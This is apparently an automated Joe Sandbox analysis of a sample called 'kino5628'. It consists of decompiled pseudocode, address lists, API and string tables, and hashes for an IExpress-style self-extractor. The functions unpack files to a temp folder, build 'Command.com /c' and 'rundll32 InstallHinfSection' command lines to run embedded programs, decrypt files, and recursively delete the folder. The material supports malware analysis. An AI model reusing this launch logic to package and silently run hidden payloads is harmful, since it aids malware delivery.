0x008e3de1
0x008e3d59
0x008e3d65
0x008e3d6a
0x008e3d6c
0x00000000
0x00000000
0x008e3d6e
0x008e3d75
0x00000000
0x00000000
0x008e3d8f
0x008e3d96
0x008e3d98
0x00000000
0x00000000
0x00000000
0x008e3d98
0x008e3c8f
0x008e3c98
0x008e3cf1
0x008e3cf3
0x00000000
0x00000000
0x008e3cfe
0x008e3d11
0x00000000
0x00000000
0x00000000
0x008e3d11
0x008e3c9c
0x008e3ca5
0x008e3ca7
0x00000000
0x00000000
0x008e3cad
0x008e3cb2
0x008e3cb7
0x008e3cc5
0x00000000
0x00000000
0x008e3ce8
0x008e3cec
0x008e3ced
0x008e3ced
0x00000000
0x008e3ce8
0x008e3c9e
0x00000000
0x008e3c9e
0x008e3c56
0x008e3d35
0x008e3d35
0x008e3d3c
0x008e3d48
0x00000000
0x008e3d48
0x008e3c03
0x008e3be2
0x008e3be7
0x008e3bee
0x00000000
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 008E3C11
CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 008E3CDC

Part of subcall function 008E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008E46A0
Part of subcall function 008E468F: SizeofResource.KERNEL32(00000000,00000000,?,008E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46A9
Part of subcall function 008E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008E46C3
Part of subcall function 008E468F: LoadResource.KERNEL32(00000000,00000000,?,008E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46CC
Part of subcall function 008E468F: LockResource.KERNEL32(00000000,?,008E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46D3
Part of subcall function 008E468F: memcpy_s.MSVCRT ref: 008E46E5
Part of subcall function 008E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46EF

CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,008E8C42), ref: 008E3D8F
GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 008E3E26
FreeLibrary.KERNEL32(00000000,?,008E8C42), ref: 008E3EFF
LocalFree.KERNEL32(?,?,?,?,008E8C42), ref: 008E3F1F
FreeLibrary.KERNEL32(00000000,?,008E8C42), ref: 008E3F40
LocalFree.KERNEL32(?,?,?,?,008E8C42), ref: 008E3F47
FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,008E8C42), ref: 008E3F76
LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,008E8C42), ref: 008E3F80
LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,008E8C42), ref: 008E3FC2

Strings

REBOOT, xrefs: 008E3BE2
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 008E3E74
D, xrefs: 008E3C19
RUNPROGRAM, xrefs: 008E3D05
advpack.dll, xrefs: 008E3F9D
DoInfInstall, xrefs: 008E3E1F, 008E3E24, 008E3F68
USRQCMD, xrefs: 008E3CAD
POSTRUNPROGRAM, xrefs: 008E3D60
doza2, xrefs: 008E3E68
SHOWWINDOW, xrefs: 008E3C34
<None>, xrefs: 008E3CC9, 008E3D7D
ADMQCMD, xrefs: 008E3C9E

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$doza2
API String ID: 1032054927-1863140292
Opcode ID: 4deba408cb9f9095229c303c535de7243fec116debb7268450ce0d3534c58364
Instruction ID: 1fac9cc8680b6a7d069fc2846378a5ef1fa4cd4cbba6f3521452fe361680543e
Opcode Fuzzy Hash: 4deba408cb9f9095229c303c535de7243fec116debb7268450ce0d3534c58364
Instruction Fuzzy Hash: 9BB1B270A083C19BD724DF268C89B6B76E4FB86754F10092DFA99DB290EB74CD44CB52

Uniqueness

Uniqueness Score: -1.00%

Function 008E1AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E008E1AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x8e8004; // 0xaf179a30
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E008E1680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E008E1A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E008E1781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
					E008E658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E008E1680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E008E66C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E008E66C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E008E1680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E008E1781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E008E16B3( &_v1552, 0x400, " ");
										E008E16B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E008E2AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E008E171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E008E1A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E008E1A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E008E44B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x8e9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x8e1140, _t156, 8,  &_v268) == 0) {
										 *0x8e9a34 =  *0x8e9a34 & 0xfffffffb;
										if( *0x8e9a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E008E171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x8e9a34 =  *0x8e9a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E008E1680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E008E1680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E008E6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}

0x008e1af3
0x008e1afa
0x008e1b07
0x008e1b09
0x008e1b1a
0x008e1b20
0x008e1b2c
0x008e1b3b
0x008e1b40
0x008e1b2e
0x008e1b2e
0x008e1b33
0x008e1b33
0x008e1b46
0x008e1b4c
0x008e1b52
0x008e1b57
0x008e1b5d
0x008e1b61
0x008e1b9f
0x008e1b9f
0x008e1bb1
0x008e1bc2
0x00000000
0x008e1b63
0x008e1b63
0x008e1b65
0x008e1b68
0x008e1b68
0x008e1b6a
0x008e1b6b
0x008e1b6f
0x008e1b74
0x00000000
0x00000000
0x008e1b76
0x008e1b7b
0x008e1b86
0x00000000
0x00000000
0x00000000
0x00000000
0x008e1b8c
0x008e1b8c
0x008e1b98
0x008e1bc7
0x008e1bc9
0x008e1bcc
0x008e1bd3
0x008e1d75
0x008e1d76
0x008e1d78
0x008e1d7f
0x008e1e05
0x008e1e09
0x00000000
0x00000000
0x008e1e12
0x008e1e1b
0x008e1e73
0x008e1e21
0x008e1e21
0x008e1e28
0x008e1e37
0x008e1e3e
0x008e1e52
0x008e1e60
0x008e1e60
0x008e1e3e
0x008e1e79
0x008e1e7b
0x008e1e84
0x00000000
0x008e1d9b
0x008e1d9b
0x008e1da0
0x008e1da2
0x008e1da5
0x008e1da5
0x008e1da7
0x008e1da8
0x008e1dac
0x008e1dae
0x008e1db4
0x008e1db7
0x008e1db7
0x008e1db9
0x008e1dba
0x008e1dbe
0x008e1dc3
0x008e1dce
0x008e1dd2
0x008e1deb
0x00000000
0x008e1df0
0x00000000
0x008e1dd2
0x008e1bf7
0x008e1bfe
0x008e1c07
0x008e1d55
0x008e1d5a
0x008e1d5b
0x008e1d5d
0x008e1d5e
0x00000000
0x008e1c1b
0x008e1c1b
0x008e1c20
0x008e1c2c
0x008e1c33
0x008e1c38
0x008e1c3a
0x008e1c3a
0x008e1c40
0x008e1c4b
0x008e1c4b
0x008e1c5d
0x008e1c61
0x008e1dd4
0x008e1dd4
0x008e1dd6
0x008e1ddb
0x008e1ddc
0x008e1dde
0x008e1d64
0x008e1d64
0x008e1d67
0x008e1d6c
0x00000000
0x008e1c67
0x008e1c67
0x008e1c6d
0x008e1c72
0x008e1c74
0x008e1c74
0x008e1c8e
0x008e1c99
0x008e1cc0
0x008e1cf8
0x008e1d07
0x008e1d23
0x008e1d09
0x008e1d14
0x008e1d1b
0x008e1d1b
0x008e1d2b
0x008e1d2d
0x008e1d2d
0x008e1d38
0x008e1d39
0x008e1d46
0x008e1cc2
0x008e1cc2
0x008e1ccc
0x008e1cce
0x008e1cce
0x008e1cdb
0x008e1ce6
0x008e1cee
0x008e1cee
0x008e1e89
0x008e1e91
0x008e1e92
0x008e1e94
0x008e1e97
0x008e1ea4
0x008e1ea4
0x008e1c61
0x008e1c07
0x008e1bd3
0x008e1b7b

APIs

CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 008E1BE7
GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 008E1BFE
LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 008E1C57
GetPrivateProfileIntA.KERNEL32 ref: 008E1C88
GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,008E1140,00000000,00000008,?), ref: 008E1CB8
GetShortPathNameA.KERNEL32 ref: 008E1D1B

Part of subcall function 008E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008E4518
Part of subcall function 008E44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 008E4554

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 008E1BA0
Reboot, xrefs: 008E1C82
setupx.dll, xrefs: 008E1D14
DefaultInstall, xrefs: 008E1C74, 008E1C87, 008E1CCE, 008E1CD3, 008E1D2D, 008E1D39
Version, xrefs: 008E1CB3
rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 008E1D3B
setupapi.dll, xrefs: 008E1D23, 008E1D3A
AdvancedINF, xrefs: 008E1CAE
", xrefs: 008E1B25
.BAT, xrefs: 008E1D83
.INF, xrefs: 008E1BDB
Command.com /c %s, xrefs: 008E1D9B, 008E1DE8

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
API String ID: 383838535-2145762761
Opcode ID: 139cd9cb66a904438f8abbe4545768fd4e7ac3c2776990399ec24bbdb8f41602
Instruction ID: 6b0b01f9a32dde530ac6cb51ba1122e47817554911c9d2c6fbb8e9d4a705c345
Opcode Fuzzy Hash: 139cd9cb66a904438f8abbe4545768fd4e7ac3c2776990399ec24bbdb8f41602
Instruction Fuzzy Hash: 73A14970A002D86BEF209B2ACC4CBEA7769FB93310F140298F555E72D0DBB49E85CB51

Uniqueness

Uniqueness Score: -1.00%

Function 008E2F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E008E2F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0x8e8004; // 0xaf179a30
				_v8 = _t9 ^ _t46;
				if( *0x8e8a38 != 0) {
					L5:
					_t11 = E008E5164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E008E6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E008E55A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E008E658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0x8ea288("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0x8e8a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0x8e8a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0x8e8d48 & 0x000000c0;
									if(( *0x8e8d48 & 0x000000c0) == 0) {
										_t41 =  *0x8e9a40; // 0x3, executed
										_t26 = E008E256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0x8e8a24; // 0x0
									 *0x8e9a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0x8e8a38;
										if( *0x8e8a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E008E4169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0x8e9a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E008E3BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x8e8a24; // 0x0
										goto L26;
									}
								}
								_t27 = E008E3B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E008E44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x8e9124 = E008E6285();
							goto L16;
						}
						_t59 =  *0x8e9a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E008E621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x8e8a24;
				if( *0x8e8a24 != 0) {
					L4:
					_t34 = E008E3A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E008E51E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0x8e8a38;
				if( *0x8e8a38 != 0) {
					goto L5;
				}
				goto L4;
			}

0x008e2f1d
0x008e2f28
0x008e2f2f
0x008e2f3d
0x008e2f6c
0x008e2f6c
0x008e2f71
0x008e2f73
0x008e3041
0x008e3041
0x008e3043
0x008e3053
0x008e3053
0x008e2f79
0x008e2f80
0x00000000
0x008e2f86
0x008e2f86
0x008e2f93
0x008e2f9e
0x008e2fa0
0x008e2fa6
0x008e2fb8
0x008e2fba
0x008e2fbe
0x008e2fc6
0x008e2fcc
0x008e2fd4
0x008e2fd6
0x008e2fd8
0x008e2fe0
0x008e2fe6
0x008e2fee
0x008e2ff0
0x008e2ff5
0x008e2ff5
0x008e2fee
0x008e2fd4
0x008e2ff8
0x008e2ffe
0x008e3004
0x008e3017
0x008e301c
0x008e3024
0x008e3054
0x008e305a
0x008e3065
0x008e3065
0x008e306c
0x008e306e
0x008e3075
0x008e307a
0x008e307a
0x008e307c
0x008e3081
0x008e3087
0x008e3089
0x008e30a1
0x008e30a1
0x008e30a9
0x008e30ab
0x008e30ad
0x008e30af
0x008e30af
0x008e30ad
0x008e30b6
0x00000000
0x008e308b
0x008e308b
0x008e3091
0x00000000
0x00000000
0x008e3093
0x008e3098
0x008e309a
0x00000000
0x00000000
0x008e309c
0x00000000
0x008e309c
0x008e3089
0x008e305c
0x008e3061
0x008e3063
0x00000000
0x00000000
0x00000000
0x008e3063
0x008e302b
0x008e3032
0x008e303c
0x00000000
0x008e303c
0x008e3006
0x008e300c
0x00000000
0x00000000
0x008e300e
0x008e3015
0x00000000
0x00000000
0x00000000
0x008e3015
0x008e2f80
0x008e2f3f
0x008e2f46
0x008e2f5f
0x008e2f5f
0x008e2f64
0x008e2f66
0x00000000
0x00000000
0x00000000
0x008e2f66
0x008e2f4f
0x00000000
0x00000000
0x008e2f55
0x008e2f5d
0x00000000
0x00000000
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 008E2F93
LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 008E2FB2
GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 008E2FC6
DecryptFileA.ADVAPI32 ref: 008E2FE6
FreeLibrary.KERNEL32(00000000), ref: 008E2FF8
SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 008E301C

Part of subcall function 008E51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,008E2F4D,?,00000002,00000000), ref: 008E5201

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 008E2FDB, 008E3017
DecryptFileA, xrefs: 008E2FC0
advapi32.dll, xrefs: 008E2F99

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
API String ID: 2126469477-4070797333
Opcode ID: b87f7d0d5b30fb9385d7da3a8fd5af57a464f4a26d4b36bda69ecc3281ff6754
Instruction ID: 9c8d5006e094c7f65ba27b1edc5c614d15d3de7645a9f57b4ed144106f8b983f
Opcode Fuzzy Hash: b87f7d0d5b30fb9385d7da3a8fd5af57a464f4a26d4b36bda69ecc3281ff6754
Instruction Fuzzy Hash: 1241E630A00AD5DADB30AB379D8DA6E33A8FB57750F000079E955D7191EF74CE80CA62

Uniqueness

Uniqueness Score: -1.00%

Function 008E2390 Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E008E2390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0x8e8004; // 0xaf179a30
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E008E6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E008E1680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E008E16B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E008E1680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E008E16B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E008E16B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E008E658A( &_v280, 0x104, 0x8e1140);
								E008E2390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}

0x008e2398
0x008e239e
0x008e23a3
0x008e23a5
0x008e23ae
0x008e23b3
0x008e24cb
0x008e24d2
0x008e24d3
0x008e24d4
0x008e24df
0x008e23c2
0x008e23d1
0x008e23db
0x008e23e4
0x008e23f6
0x008e23fc
0x008e2401
0x00000000
0x00000000
0x00000000
0x00000000
0x008e2407
0x008e2407
0x008e2408
0x008e2411
0x008e241f
0x008e247a
0x008e2483
0x008e2495
0x008e24a3
0x008e2421
0x008e242f
0x008e2453
0x008e245d
0x008e2466
0x008e2472
0x008e2472
0x008e242f
0x008e24af
0x008e24b5
0x008e24be
0x008e24c5
0x00000000
0x008e24c5

APIs

FindFirstFileA.KERNELBASE(?,008E8A3A,008E11F4,008E8A3A,00000000,?,?), ref: 008E23F6
lstrcmpA.KERNEL32(?,008E11F8), ref: 008E2427
lstrcmpA.KERNEL32(?,008E11FC), ref: 008E243B
SetFileAttributesA.KERNEL32(?,00000080,?), ref: 008E2495
DeleteFileA.KERNEL32(?), ref: 008E24A3
FindNextFileA.KERNELBASE(00000000,00000010), ref: 008E24AF
FindClose.KERNELBASE(00000000), ref: 008E24BE
RemoveDirectoryA.KERNELBASE(008E8A3A), ref: 008E24C5

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: fc8181d826e56c029a94dfc8d47b06d869362992f269ca825c0ec08aa7e36739
Instruction ID: aced04a902abcb31b1366ea717f9c060659648ca588f9c01146ae6ad188657b1
Opcode Fuzzy Hash: fc8181d826e56c029a94dfc8d47b06d869362992f269ca825c0ec08aa7e36739
Instruction Fuzzy Hash: CD3192326046C0ABC720EB69CC8DEEB73ACFFC6715F04492DB556C6290EB34A9098757

Uniqueness

Uniqueness Score: -1.00%

Function 008E2BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E008E2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0x8ea288(0, 1, 0, 0);
							 *_t21();
